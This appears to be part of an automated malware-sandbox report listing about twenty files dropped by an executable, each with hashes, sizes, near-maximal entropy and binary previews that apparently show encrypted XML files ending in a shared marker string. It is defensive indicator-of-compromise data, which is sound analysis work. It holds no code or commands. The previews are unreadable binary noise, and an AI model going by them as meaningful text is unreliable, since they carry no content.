              SHA-512:7AE7B86ED990101F42FDDF432089786FEC9192D35605E810F6890AB31417E3CD23593DD63AF7D4C1FC44FBA0F24DFE12890821A248AB78162770C85AB36FF9F5
              Malicious:false
              Preview:<?xml.C.p....-........y...zQ...Y.].C...i.I..k.7...... t.a.%Y..u...-\a.e{....v.3...":.....$.....x<......u\6...B.?Y.p.-._e!..>....f._@V\...S...8.+.....oht.....5........UE...A.z3..Uu...tGUN.B.+............>...(Zd{..8k..UT..fr..w.......7...'..e/..!.D...9h......{..HA...G.O......,.Y{oC....r.'.nJ.zD.*w...m.n......F..C.=O....@.".Y!,.xN...otT.T.*v.n..u....#..jX7.x..r.E..s<...nf".[.....1vT....)c yT.R.b..f.p..nU.6.....m.:../IG...v......I...b..h.6.=..N..`.A)....].&.(..8z+b..i.:.p..5......W....)6`]l.;F....'..?...5n....8...p......fS....y.5.#.2.JPh.<m..*.n. ....EMF.+z=...a~BG.fd.rc..v3..V........iPm;...P\XC...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):881
              Entropy (8bit):7.778389427503643
              Encrypted:false
              SSDEEP:24:LevZNuF8hUpjnw6fCyRGc0BKhlxikhqoAcEVd+bD:yZMt9w6fNRuKNcZ8D
              MD5:BB96397989984C07B15FBAD07185D20A
              SHA1:3379EF63A3763A9E6B450BBED9592EE0B0CCC336
              SHA-256:6916B33FAEE1C5AFD84E76337B386365571D8A81F24348DCA64DCAB1DC20A2DA
              SHA-512:910A625A046601FAE26DC7722908F9A1A6064D82EB375377AFFA300A19517907704C678361DDBF66861C92B98D01F30BD60F9CD4494019390E97DB8CB9359C8A
              Malicious:false
              Preview:<?xml.>N.F.m...2.v..y...,z....0.[.}..q?.V..E.n~..&/......K...@,.....n.......r.m...#...D..V.FV.J.wl%u...x36.|..-.........v.N..!3Yw...0.t.y..#...s...:.(...S..v...b)..y...6..b.Q..{R..+.......^\..:(..8..K'f.$.7T.J..Jy.mG.-.2O...Ng..[l $V.......j....O..eu..".z........O........y}.........n..u..f.....?...O..t.#.B.3..oT......4...r..nM.}1./..(5...K..G0?.......|~..V.Q.......].1.p..P....,e.!P...O..Z#BU...w......<.?..S.QC....,.:m.9{....<.u.P.....P.l.`..G:.R...d...,g..rD....Q.j.T9...d..M.+y...y...$"..A....*p..-...'.W..,./A.......#.A.Y..}.Y,a.G..B_d.......%..gV.M.ZZ...{... ...(..L.+.6.._H.....%..>..)#.Sn?._....K.Mg.d..Cf(;......_8.?...@.EQ.k....S..%.d..y.H~.+Yi.z?).......bj/..Y.........h........&.a..3.b..o.y..,..iO...t..M...... .0.0..LU^.0*.C^;..f+..o.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.688637108558289
              Encrypted:false
              SSDEEP:12:091v9BggOG3Gadx5jHBNBvOFtadcOcc0srN7K89zaXVESZXhrnlJs7Xdxa3cii9a:0Hv9G6GoxxHBNpOCdBch478X/dhrwTd4
              MD5:240887C4A9C146495994D3FBD6D16348
              SHA1:A71D440CFCB186FB08C239FA24FEE2D63B42BCAB
              SHA-256:8DF82927365FBDE42E62E2313DD7C55F14DCBD7CECA437ECFA06604A77CB4EA8
              SHA-512:EB4A4EE07D1653B47AB4C1B9576B4084368DED30105051C062F352DC97C8BA8DAD59DB5EFCBC3F9270BA35303F85312E831628D702CD2AD92802CD31A14CDF24
              Malicious:false
              Preview:<?xmld..,...zA&{!......U.S.........S..7..)...O..Ub...".9N...6.T.@..P.rCxW!43......I=:.;...F...4..OT8.V4.E.s.EL.P7.w..xb...Cm..?.......n...".m..E..~.23.;.F.........}..C..m]....^SU&.3&i.[..[k..B... .....Q..!......-.U . ...V.j.tTD.F-:GK. N.....+...tz.1x.M;Vx..!3q.!..p.>.Y4.j..}..........!].9...i_...C.I|..........s.D..A.a+...:.........0...Ai. V.K..U3.....Z.*.Y>....b..*....[..?.n.<.....(.Y;..e.Q..|.d?..`.9..~+Q..}w.b..UPn...gY.VK#..n-3.^.h]..E.J|....q...'.Z......5.......][Q..w,i......L)...4j.>.>.P.@.."..}...O.S....v..7..=;.E.t.Oj.u._.....I K..^:w..d..`...."A.$-lj.b./j.e..v.G.....nwKP.t<q..L...~...#.Y..%.ck.&.....l"77.NJgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1421
              Entropy (8bit):7.854933035141837
              Encrypted:false
              SSDEEP:24:TTNx9hMZF7aw8Ppnj7fbA+GsjEfReWFOR6gceWJCyBOtVrRLmYZegCSclWxmFzd4:TTNx9ke3V7c+GsO+ACyBwJRRpCT4xmFm
              MD5:A657871D53EF4BBE195E0E03D08849EB
              SHA1:2CE4783D64C07B1CBE9F8100B6F519CC9CEB017F
              SHA-256:CD5F8644DDFAA9F9D519F2A9FBA2C367CE42ED117FE8557A8AFF7F9D63C10EFC
              SHA-512:B8534B04D7DD8B1C53545367B1CE8E200E78568629095E3F437BB0A1AA11A3E5EC584DC20102472F1127143D1A172A9D73E529764BDE79F34EC1477AA9A0EC29
              Malicious:false
              Preview:<?xml..<.i0).1$..B)..q.<..?:.[^.+.`.K..."Y.~...+...q..2../...y......wbdi.06.ZPO......=%.....P.~...]E....U.a#<..&........`.3.f.u1..TA...x.k8............y4-KL.g..]y+4>..."}e...HX2Ar........V...5..mn.....R.z..Ge....d<wS.)..OK..;.vh.......?.h..)c.J.K.#...%.?..L.TP..<.p2.|...E.E...#..2.........Jf....\...0...:.G..EF.j...C{...[7.s4.h[.=....&i.t.....4Q....e..2.S.uf..djh...H...f.......)jk=../d..".......Ek..N.....B.p.........*.;q.C.vbg*.E...C.'.kVQ.3.{...M.y...U..)i........x.WCU..........L..YE+...p.e.+Y.$|E.mT..&%d..2.a../{.V.Ksw.SJ[...6c}.4.\.wWf.w..}.....LK.?..FX.^D*....%.....3...@..Qq...\r.......(..k.$...8../.Os..=.....P/Ti.+.h..k....v...ad.3....?.7..lF;|.S.q8,..X.3q...[.-+./^C..Bi..hG.I....J.............d...iI..;....U'[M$....x~..\.Z0....%.Ug....7.w$ .h..^.n5.mrn-\..r.W.....>` ...Db......./....,.....q.!.d..p%..rJ..%...rI.......6A<.....@.O@.]1Me.....F.[....R..^.N.-y..]...l.y.....B.8..'..49(g..e..d....Z..Y7".9.....H.<.9.^;[%...........ki.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1171
              Entropy (8bit):7.8145320305515185
              Encrypted:false
              SSDEEP:24:nd4oPHRC1bOqFJcXBQv/FINioElGATE0HFIvfi6Iyltd+bD:xHE1bOqFmXBY9ImLx8fi6I6H8D
              MD5:A300227351ADFEE87EF065398BD29FFB
              SHA1:7E101CA4FE5B589EFED187C2123516FCCCE06DD7
              SHA-256:BDC6A5FD00678373D015870A9B2A51410CCB962B01517578AD46E469FBBFF49B
              SHA-512:4321A99E893815AB65147F34EA8AD8DFEA5FDFE9E3031F604D32FD18228870933983D274B5DBBC6212E2B141CFBAC8E71AF53C0EFFC45F5A83BD1B5111FFBDBE
              Malicious:false
              Preview:<?xml....2h.......SZgr.=...i...4......G.........r.6/q.B..L.....i.6....~b.....Dg..f......H.$....k.M.Rg.dfv.F.m.f.Zp.4...%S.8.....g.<J.#.a.,....3.W....@.u>3...lS.......,'........-...o;...Ue.<.6.8.+4.....VkQ..QQ.kS.`.x'{...l^.Ub.s..Q.bo.................>QzEU.eNj..J.?.....J.....8..SDZo.6.I.>.).t.......y:*.J.L].....}.o4....9.^...<.)........sB.....(....^L..",L.E...}6@Y..|V1...k..2.Q!..!..@.|F..1v.....E&....X>..70.....\e..2.!.!.9...T~..u.+.k..l..c.H....!b..>.....Sn.Y..s1.Ea...W2'...o?%u."..r..Z........~......S6......fmXs:..(./.f,.T..#5.....>6...I..O..t+...^.Lh...9..o*.+.....s.B0..%...5.4..0.]./....H[b...<......~.w4.x?..F........*..=.p..S.M<./..P.g-v...p.w.n+;R..S...:F.......m.(.........G.(..oj.......~......H.i..K7z8Df.L..hh.l.)..v.l.l(..W..Bt..$...4."./...i.4h.."..K5..".l.v.G>[.DF.=.%q......v...N...V.B>O.-L.VS...+..Q..p...Cwc.....&c....}.....`-"...KR...S......oW..>o......g.^...2..6.p.3.1...I.y.:=....mH...@!.6}_..mk..K..N.E...H.1.".....5.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1176
              Entropy (8bit):7.811276919701794
              Encrypted:false
              SSDEEP:24:J74CCs0+piLhk+fOTkq6VTUYcKcuBwODtLd+bD:b0+pUq+fOotD9BwwR8D
              MD5:C8AD797EE671DCEB8399F276876703D2
              SHA1:A29F3AF4EAEC1832783DB282BA25CDDD51259FDA
              SHA-256:F5E6A606033534D754307C3B195063DF43EAE36EDA66A513201D5F8B566D69D0
              SHA-512:5AA1DB9FAD197DEFAEDE4907BEC580535F99004578498F2E95FC4F25F620CFE15D226227DA3CF462E7BDA010217B42C3752001FA4335A0CDE9B13256901D1D47
              Malicious:false
              Preview:<?xml.1s;..Nk.w..@1.....V....s..Z5....\..F.0.H.FK..w...y....fY.:."m...Y.\..'-e.d....1Ik>.L..|..e*w.u..;d4.......B"...2I......D....^6|Y.tiz...........\J.D.;?1..9.k+mDh......6t...q........l|.....nt.4e ...h..XE:x.RU...R......1d%...8vW..j..;..;8/L.?..7....2.C5..X../g4.........ea....kl..Z..{........I....{.G.!I...Zm..I......0I...c>.V.6.k...Z.*..b!...4.....A>aJ-.p^.f.mv......p.0[.P...2...D`...c.Q.a.....Y.....6....r+..1LN...(.X..]~......r..$8..$..'.5.p.h..I6%..S.Ei..v.a&.G(..>;y.}r...g%..+..R...L..?.N(.*..oal.B...,.;..xA..o.;..*...C7....n.....:z-pu.t0e...D.?.zB...1..H....)8z.9....bh..{U..D...>D...5.>............C..`..-..6...............C.=...q...a..S.:`....~5]:.....cN.....Z.........@r.F...Z...o.".l}..I2......0n..V....t...&.I....HR....#..E.c.<p......p.^5.....p.O.h....>&[.y.I..`.ndm..[.)....N.(..$..4..M.......w...s.{.]c/~........L.@.@e...:..n0vL...z..S.=lq...l..GG......$Q.V|.....&...t....a%...=..jw4..N.....L..1....F.U..).m.U._..\.;.L2..Xrda8.\.g.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1155
              Entropy (8bit):7.826220230539901
              Encrypted:false
              SSDEEP:24:xxbx5IaDhoYFuxgucw8sCosteQkZwCd1S2d+bD:rAaDSYgxMw8sYteXZZd1p8D
              MD5:7A9284BC90C048B4DCD2938673AA8087
              SHA1:2F8F33EA9932DB174E11BC958A0A35C4F5E342C9
              SHA-256:6FFCB9C74EB7FE34724A92935D88E0392C504A220145C442B0259D47846C1620
              SHA-512:772FEF13D7CE895DDDC14B623A24AD0096CA03F7D700B601241AC0B51D17024B7B67DDEC859441CA2B112324A8C3FED757D8CFC4D49322479358BA33C3AED911
              Malicious:false
              Preview:<?xml.r_.J....b..}..$.c....\..u..R_._.z...N.M..EQ.,..~....I<..R... .~I.TK.d.Km_+....EGw.fx6.O.X...xsj%bql2Tk|...1..[.#Y.m....D .\B/.....g...Q%0..O.w./S.~.w..[.<.\_u7...w........M.o~s...A_O....L.Ep.A..u0..d{5tBD.%........o.....)..+..m.9..I.oq..s.8.Z|#&,.....0.:W...z~....].^..(.]......5..X&..i.W.6....R]I7D.....>@W.....9o.2..1.l~HT...,...c....s.4.N..a....T....>.Z.b.A...:..../....l.T...d.Q.#.{..a]m....G.^...ts.a..z+.yu....d..n.....z}..8..w#K6j-/2!...-...4^.h..?..z$X..T..@*.1.O..'.*J.. xk...U&.T.xw.H.#I..Bw..`..t.!B.y.....ryd.>..%2%Z.....'.H<...A.M..tt.Tg..|.%..e........T.[..O..9..c..u{.?|....../O.O.2...<%..{..S)..Z..{..<.....Z...7.21%d.a..`m._..4..|.^.8.`2..3v=kS.[...A..G4...G.YP?3..-a.d5.%....K.......eH.1a...r.....g...xC...5....M.k.w. ..@...i.*.....`.Y9OZP..=J..u.X.....!..J.:.....f.>.d.4G...6;.....7..~h......6\...U..I.^.....h..^....M....[......o.1+.....J...K.t.._.?.ey...5..,..T'.........h...p@z...[..3.. D.g.=...2. M.R...U.L.W..*...*.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):715
              Entropy (8bit):7.748998957997653
              Encrypted:false
              SSDEEP:12:6KyUAe6GSXzYuLsDeSkXgVF4fRleyDPLawXZtV3U8CpmfhyOmHsWadxa3cii9a:np76jYuL6Dwgv4fRwmPLawXrz6mZ5mHn
              MD5:997AD409F274D6F79F84273806E4072B
              SHA1:884C2F3C2292B53AFD0BFB1A041F70ECF33BA681
              SHA-256:52DA3FDB687EFFACEDD23413201C762293DD83918D0C34811D1354D3BC9889ED
              SHA-512:029ECCAE9FC2D8259A0915015D7EB57F5BB45C495FA9FB39C77E844158D764A49EBD1B21575306F3AF3F3FEEB6728E624D8D2EFE11BC7788F5D4885C2CA2D5BD
              Malicious:false
              Preview:<?xml.(...QrqR..Z...f.._.....]co...)?......d.1.."IO..R;..I..k.....!....UBH..^^....o..F..A_....V.X7.]..|..._..|0..[qM...;...<....d.:t).....+....w..:K2...d..^.;Pke#...#B..i.k..[b.../q.E.WB.."d.u.A....).\..3..e..`.XS..n.S..j.^.(Y@..D8*..G*D.%c.H.y:.VtpW.\.....%..U...s.....H..{9.FU.$c...<...F.[...y...<..k. F.G%N.1.C..:iV.LL............DE....D..o..T....\.yV....... .Z..c..o..5.#.......g..,j....J...?e ...XzNU9...>....9...n#....._#!..R.|W...B..:..H.5......{"y..t-.......f..X~.Jy.l.:..$..<k4H,....w(.........;g9......y......*....b}Jg{...&..}?%..K.2.v..2p..x...L.K.E.......<U.L.....l.:.+.X._.~.....I.hS4.4....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1398
              Entropy (8bit):7.869342389008334
              Encrypted:false
              SSDEEP:24:UTCIn1r+pt3g+QKcvl/mehoi4MnE+WcP3fp4RarJKXJResWPd+bD:Cdn1rMtQ+7cvleehoP5+W04FJRezF8D
              MD5:DBF1F11EF52A9ED82B34B9A8900DD93B
              SHA1:C514BCB291831332E780BC4FAD6CDA8774F2678B
              SHA-256:5D03555E8169BEA7D9DFAB9DE0C99D1226B023BD9C421294DD25CBFE76F161DF
              SHA-512:B73256B0224A5647FFF2CC8031ABCAFCA260D1092489AF34B704FFAAC741B2F4B81EDD34D73DFE946086DDE2A14FF9BEFADF6A6C2A59F68A5048FD137CE98320
              Malicious:false
              Preview:<?xml.x...L`..K...^a.).}.B...l.....T.w...1.K..d....&:.C....Q;5.bT..dja.`.,........`..PE.....{C5..>..%p.g.h..M<%... J-...."P..../.."5.29...S.^......hTiV..a3...T...._[....v...].sq..KJ.....j|....n..Q.y......8...R....w.r}.+....f.X...3.f.QP.dG....x.t.9J..a.F..n.%~..S..Hz.......e..........X.....,...h.....3.-._z..h..t...E..u.U.W8..;.+.....%.....a<...:..'.dG.....9=V.HO.....K..4.:ex......JEg.80.-#I.+.T...N....7..6..F.$M?.....e....[../|.9.5.+..H..%...w..c%..0.......&s....A..|....Z]..y..:.K....#..Y.T...e.sq..4C3...:._k.... f....+'....tpY........:.<1.X.|..{=..N..x./.G......|.}.../~=m.....].`.ul.c+.g......m%.{.hF..S..9...U...g.m.,9...%....C(....v.2";7..GKGK#.{D7!..Q.w..xRdQ..9.....D2!.......~...f...}......[91W&.%.0t..N=m...?...u...K.i..(d....C@..wzXk..6/.....6.'gF.NG..[....v(.U..qKg...XK...q..)..x...c.....4...)(..i... .......vb.u.@,PL:...'V..i...vN9 ..KhEc.i.a.ajcu..T.:.......U.!.7W....M..LH.........oo6.&%.@G..>.b......ew......&.Q2_A-.S.YY.3UW.R.m#
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1008
              Entropy (8bit):7.7970645056714005
              Encrypted:false
              SSDEEP:24:MDthU0O3/P4cBMt8YBFD2jY7Be5uttKElp4fXgKXWY3d+bD:uU13/P05BEOBwuHKElKvgHq8D
              MD5:370F62BA23EF1A041E111AFAF139D590
              SHA1:09311FC8E2A07B840AC78F2057B18D699E2FB7CA
              SHA-256:F21C38BC51E1CC82D633D87B2A6F060410E65BAF31D5110470804351183DFDC6
              SHA-512:6AF26F38368015F1CDCAF3916FCDA883C7623B24007A26078D4694E4E53514987C02786A2D8FC238AEA8F06DCF9D15DA67F3CEF920626325538D6E02F287CB5B
              Malicious:false
              Preview:<?xmlB.\..#.*........\+...E0.M........5..\........</....0..9.7R\.K....].s3.T.....)@.+...!).>l.........De.?.T.......iE%4.X-r..K.m>....pZ.-u.......-.Z>..k.LHr...1.../h.{.....9.,n...Z.....k..yf6........f..|..]j}..7JgK[.J}>].o.....LO....I.e....)v...5.v....#.........Z..*.q._..q....75N.w.@..8......,.a.,m#.OP.....7I..'v7..]...$....:.a.U9H}........1Z)..~...:).4.u}.&.X..n.>...5m....L...n.........f.VUIbV..AdS...j.Z..RZ.@."@..1V.\."1....s9..Y$*...~op...6..f...R.\....^s~.....K0.(..t...;..R...y.sN...^U.5....).......J.A.......[...4.y...+.#.......H.-6C_ ..}...v...J.5IU.....:.......d..l?.G..../.....1..GEE...su[.........._^............\..]..../..I..._.+..8D.G=.!.47s...}.J...6am..E...F..kG.{D.....7.j8....J..S..@Kv=.hz.f;Yl....}p.C...^0.....IO.o.bP..*.k....@.$!8WB.-L.1...!i.....k^.l.....H....G1........y.N.......*ADsO.....=.d...G.C:..6D:..2..!,..l).....w........&!.m..:;..@...kU....+.....H8..&..`....X...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.721806322858484
              Encrypted:false
              SSDEEP:12:mE0u3ol+cCRaqHNkJmMMHs3kAZOyxOvfTNc39lZ3eRX+Imdxa3cii9a:SgsKaqHmErfAP43TNkDZ3G/md+bD
              MD5:87D123A6DED7C362D8DFEA2E0ACA197B
              SHA1:283FE8F9AF71531FE05DD2EBCED59F91D0C1ED6D
              SHA-256:DD1DA6ACCAB54EE9BE19CB7334200DA3F3F19A9485B676B3E4C95AC73B6B2E6F
              SHA-512:530E010818F8236B8FFA69041D0D1A3F91DD26B9E3D80F10FEAC6078C2828D03798E757DB67FBF8ED2B98F88BF1E99A960B71CDDF4F39770C6ADF5479D910278
              Malicious:false
              Preview:<?xml22<.&.o_...~V.......&....Q.....X...k....uQ......R...e..k.@ZO..i....<.....+.../..#...k.,.j.iD0...\/..i...8..g.........".......6{.L.f.1._a3mX.......B.h.#"t.......m.L0..~.?....C.]k....#...x*K..c.41=.V...+.d0....-sC...T..F.>........lL.m.v.xlZd..1..q.q.1h."....5...1q.O{.~.%$C.n.#t`.V........l.0...T.'.J.f.n.......A...s=.j_`.4.....Pf.a$F.J,..Wz..1...{..?y."0........1..$ds..*l..Z...n.b..).G..=S...7!..I......z.(.~i6..JHr.k....3j.n......{n..^...wb.\...Q.7..........N.....L^.qq.v}.dn.......O..t|d...&...C.M.O.z....Z.....g.vv.7.3T>.|.`.p..}...n^..1>[..^kA.......|>..`...3....P.. .7{.rV...t..>RG[..;...y..B..Oo......>...0gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):793
              Entropy (8bit):7.713758331067789
              Encrypted:false
              SSDEEP:12:O2WzLcpRFdDbt0EI09dQF/D4ahClzvTlQA4nMwhy8/6Gkwp2cvfK+O0dxa3cii9a:O2CUFp3N9dQVkGCZ4Mwhyvwp2Knd+bD
              MD5:F60C7330F7AB81395DF79EF71AD22596
              SHA1:08F049E04781066910C515C1A1425A3FB76A488F
              SHA-256:29FB92C2DC98257B131720081FE0801D65B59B92A2C47EEA069320C9B64804A7
              SHA-512:208CCE30FA90D7406EBADC3036C8CB50FA3F7478355AF8E8B85A444CDCB02B5592ECD1F2A95BFEC8CD9EA5815047677A08682B58DBE51605615364BE8F7674CE
              Malicious:false
              Preview:<?xml2..%.yv.X.V....N.]..T...._.".a...e%..B..k..O_A......[&..7.....Y....@....~.N.Gg1.a.....8.Yz&N...B.P.7..=.k'A...:...tv.8.]U..pc.T[..aw=.-.t........1....*...;.}..H.."...C.?...9...............%...8/}_.....&+e..@Q%...H..0'....hU.X...c.......au..(........... T...'f.~z*...'......A...c.!la.'V...\...s&..I......J.....d.+........t[.z.E.?..P.....i...T.:.R...p...Q..(..[k..Nd...Zfr94.i.zQ.V..F0'.A..VH%z.;...^....~.6:H.y0.jI...7......+..J.1.C&\."LyW1....^....p..~z....S.$.K.5y..s..s..b.O.*.OI.5.kmW.i......o...R.H.....1....0.a'...%.9r.CW...:Q...sj.6}Y...u........5....B...O.........K..&}...~DI.sXw..Dc..X. .]RUwB.=. .......|.S.......'..(.....,.I..L.B)_.H7UK..a.._.[.T.fC.w.V..}.d.'r.^.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.730279926251439
              Encrypted:false
              SSDEEP:12:xCMqlCYH68g5Fh6OXAI6g1zVUBbbo+Tflj1NtbI0OAYC5DFKzAUd7dxa3cii9a:qqf5FkOXA8Pebo+ZpI05YCzo9d+bD
              MD5:6BD8AA40B86DDDA20F7BE7D7982190A5
              SHA1:908C409AC61709351E12D1FA1BE99D1877BB1E7B
              SHA-256:19301D02158CC953ADE7BB4EB475056E9146F8232959040C9FB8E49B5C3AE7CE
              SHA-512:5AAA2ACC13493433F3E3298CA2D4955B7FA82B7C63AC90557D957EEBE5966B8BA44AF3D12F27082C8CA977F0BC06C954819518ADF5CF177B88EA72A87E65F699
              Malicious:false
              Preview:<?xml..V..n5=.W3.Y.^...#...c.5.Q.3..;....TW..O.Y.......m./~ o.A.Y.j?......l...:X.x.&4.+...y.DD..K>..4....b....;.zUT....VK..o......;..I4.e.V.0.).g.Z.....|..|..e...&........Y.G&...4g.Iv.qP.p..tn.9.`...VA.w.$.yh..w.Ad.F.p.T....o.Z.P..K..r..&..N.@....T...x..x.%.....ut..W...?^..B.......j.[...Lw..%i.4}..V.I...'.>]..)...K6...]...b...U.-I.S.d..*.H..>|!.w*w..7..}k...P.............S.&0..V......n.c......X.....br8$=.W.......[h..P..K...92N.a..,u...5...WBgH^?..........z...\.E...<R.p..U.@.....SC.M$9:.\.-_vk.{z.k]..f..7.......pI.....7*.k.......K7..Pd<.>x......L..<..S.[..mt....4.)ve....#....p.c..Au.[...|>k.....Y..L.`...;E^...*..0.......Y.\...hS?...b..,s~tA....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1306
              Entropy (8bit):7.826625365572696
              Encrypted:false
              SSDEEP:24:nVuIPLrNd8zfc5oRvO4vrmnKx0TxPKrjD7eQMN2C1SxqqWoW0IGfed+bD:nVLPLj8zcGVmW0Tgj7eNrfc788D
              MD5:DE9D7F0BBFF2DC7A8466D7A557A5E868
              SHA1:9C3BE735B2DDAF6C32974815778B010806E7900A
              SHA-256:11031F0EE1DBA2504C28BCDC78D4BCD11031D677FA9FCDC3AAC302FF440E9BE8
              SHA-512:A71174C673863CEF508722C2DAE1650CE6E980C3785F0B46EEA65E4320DD20977828D900602F6FCCE635D0994D6BCFF24067C1FF4063888F54F8765C9FE02C9A
              Malicious:false
              Preview:<?xml.w..l...8 .S.3e.m..J..$....S+?W.TM..~.l.b.-.3=..b.*.9...3..Ax.I......^...=......pw..)l..X..-V..YQ.../..7Qf.7.!.I.k..D.....N.aX.:...I.l....y...|.!<M.{~....[I.. .f...E.......u......./!(.F51.]qS.rYE...;.3...B.D...`n. ...@O@.o.mz.P.^.sw._.....ZRR.......1.$..r.!)N#)j..._.l?.v6X..!tG_&....B.>.......&..r...*...F....l.E=r..../....."...|.dS...=z;?.,.S>5K.'.b.:....m..m$.....[.'..................bY......... p.N=5WO....h. sl..E|...&...t.m%.^.O.M...i?....dD......7\.#. ..q w>-.....f..s..0....`...R.1*j`._).u.....Q<...U..R7.].m8D.M.N...X....>.....$^.f#Dh.Z..4..f.^t[.%...LZ..1.f4W.....o...>.=-o.xW$..i....n.....5?.f.sNQ....{..<....7.......n..v...."..2..T.K...Sd..v(.(.[....#+U.Z.....%L&.yX.*.....-R^\.j..K..}z.L..L].L.=Yfh.....F.....f.....)Y....ZR.]Oh..ce.p..%t...fw.JB..=.D~..o..8?.2m.Fs.........T....sE.)5....G.|.X.YQ..+..Z*...l.YP....*.Zz...I..nD.b...R....z..uG..Ei..{..W..9..7$B.].ja.U..5...Cj._\9z+.zS.a..J.F..\..Aqn.f..QhO...........i~%FF?q$5Q.U.&2
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4285
              Entropy (8bit):7.953531276616554
              Encrypted:false
              SSDEEP:96:ay1UEJVDFEmQem7kgyxpETKpjdRvoMoLP1KP35ilW:aeUEJ0mQtAgyxpZvoMa9KP35io
              MD5:676179DA22F2879F8364C06E49E75C2C
              SHA1:A877A1247E7D301ED55FA7A73CE6A44EB5944543
              SHA-256:8C77911DF81FB0F93CCBCF8BBC0F3DB953311116F465BD2EF59D7B0A3D86D3FA
              SHA-512:FAD2D9B0B2D47EB219BBCDA21106F2E591EA51CB3B7277897E607CD2F2FA1ECC48D760EBE8CDCF89CE1AD11E56B2449D634514C21242EA3057383A216BA01E26
              Malicious:false
              Preview:<?xml..g.R...b..k..v.....m$...j.7~.[$.>o...g.;a..@.Ek..~.p.:b.'.t.E...{9..C.c&.9#..+..mr...j..dry=......`....rW./....:1w......w........n7.B.N.X.J..d....B..vOT\.........`...H.x.g.A...[..?.jg.5.b......:.O.Q.+-.S1}.9./.sJ.j....Z\.}.\...8r.!t....7!.\..%.O.A.....~..P.@G..L.j.O.......5!.v..&-..T|....<...N..5.vW+"...43.e.U..D.I...~{*..CwWv#.l....W......1(....._m.?.?........}E.*....g......J..B...*....X._^.j.D....9*..w....z.......H.2R!R.T....'.Z... .*l..Sw...o:..[a`.'zr*t...t."A..*...;.2.$.........^j.d=0B.r.?...1?=..A[...F.&J.`..a..3.......WKU.LA.F....@~.p;....L9;0....G....6m.c%j.{.8.7...H.I.,b!.._@.s(...k1z...P......~...eh...a.=...g....J....\...-m1..HPriz.w..:.5F.o.+a.-wG.. v.U.?$,..{.J../.^h .".=p....o.i....4.+.(.wc...M..i..J`.l..!...d.C3...;....B...u....<..t.Z.Q.3lR..DI.....L.s..$........X....D.L....F.....C..TU....q...r..../.Z......N.R.:.E.(.)v[.-...*....'.9../...s.....dH..r.......5..}...Gb..K$......NA.:.l*"F..6.y.9.r....3F....Z.A.?.8%..y~]aI.\s.+..@.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):854
              Entropy (8bit):7.757140408017096
              Encrypted:false
              SSDEEP:24:04ABzpKH6dOgTTygDBeqP7GSg7hVm380Yf9wgLd+bD:04yMCT49X1wgR8D
              MD5:7A42B5AA94C7AB2B4AC692D6123B1F3B
              SHA1:CBC8BFA91D6DF96E4ECBD31AD1A3749193FB3D08
              SHA-256:D9CDF725BD82E2FFC39B78B1FE67F9FCECBB57E7542224471F4B26201E6939F9
              SHA-512:ED3D87591ACE9B4807F8CB66EA758F6F3B2FF14DFFDE58DFE5C11A4CDD5C1EE9D070E21FCEA10AFAC2935FDC3897AF485020B335A690571BF3E13F5D0E2DDFFE
              Malicious:false
              Preview:<?xml|o.s..4.............K:..Ag....v.f.._/D..\.F...H...33x@.Y=..!.IVy;4+j..A.....Q.]e...X...E..wl.....b.p........s..E0..').-.;..v(..e........2[....P......S...!... .....].."/."E....1...).....Sg.:.2......f.d..:VL.L.{..%..P.......6{....W..i#...q..{v...}..^..47[.L`.f.P......i2M.;.v.).:u.K......%..P.pH.B.WJ..%T..R.9s..c.....^.0..._....o..4u........).i..zo....... .i.%"........1.?.R...6%L*-EBn...8.........#.&.[~og..Xkmp..,q.*.L...y..$.j#$P..iF...}...!.....c.=.....L..!.m...t/?....^...6x.mi......?..n..t..mU.. 